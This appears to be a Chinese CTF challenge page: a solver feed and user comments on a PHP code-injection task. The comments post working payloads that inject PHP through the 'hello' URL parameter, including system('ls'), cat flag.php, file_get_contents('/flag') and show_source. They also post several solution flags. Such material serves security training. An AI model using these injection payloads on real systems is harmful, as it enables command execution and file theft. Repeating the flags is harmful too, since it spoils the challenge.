评分(10)
解题动态
Niko_83c 攻破了该题 1小时前
542698 攻破了该题 1小时前
slsdy 攻破了该题 4小时前
IamnotLin 攻破了该题 12小时前
zzZxby 攻破了该题 15小时前
yyc4088 攻破了该题 16小时前
xhonggcc 攻破了该题 19小时前
570570 攻破了该题 20小时前
lilym 攻破了该题 20小时前
color111111 攻破了该题 1天前
18996315220 攻破了该题 1天前
BLX123 攻破了该题 1天前
xjn12 攻破了该题 1天前
SDLbyZ 攻破了该题 1天前
771232546 攻破了该题 2天前
19941759966 攻破了该题 2天前
lancertyk 攻破了该题 2天前
zdabajfk 攻破了该题 2天前
---snow--- 攻破了该题 2天前
评论
zhuleixy 1年前
举报
我想的是用sql注入类似的方法,把var_dump注释掉,让其执行后面的代码 http://114.67.175.224:13863/?hello=$SERVER);$fileContent%20=%20file_get_contents(%27/flag%27);echo%20$fileContent;//
15738762315 1年前
举报
flag{6dd6075616f5943ab53cff237ff1a63b}
maoctf 1年前
举报
flag{b97285ef92aa650fa9223aafc7adc646};
哥哥 1年前
举报
http://114.67.175.224:12290//?hello=file('flag.php')
z03ctfer 1年前
举报
?hello=file('flag.php') file函数是把一个文件中的内容读入到一个数组中
马踏黄河两岸 2年前
举报
../?hello=system("ls") 可以看见有flag.php继续命令执行将ls换成cat flag.php
lilifanqian 2年前
举报
flag{4cadd25b49840f0cdb999cdabc86b103}
18843672580 2年前
举报
flag{21ebfdf5494104f4f54eca2bdd3cb902}
鸡你太美 2年前
举报
http://114.67.175.224:14089//?hello=file('flag.php') flag{1c587b72b36adc6efad7f93dce06182f}
啵咯啵咯 2年前
举报
/?hello=show_source("./flag.php")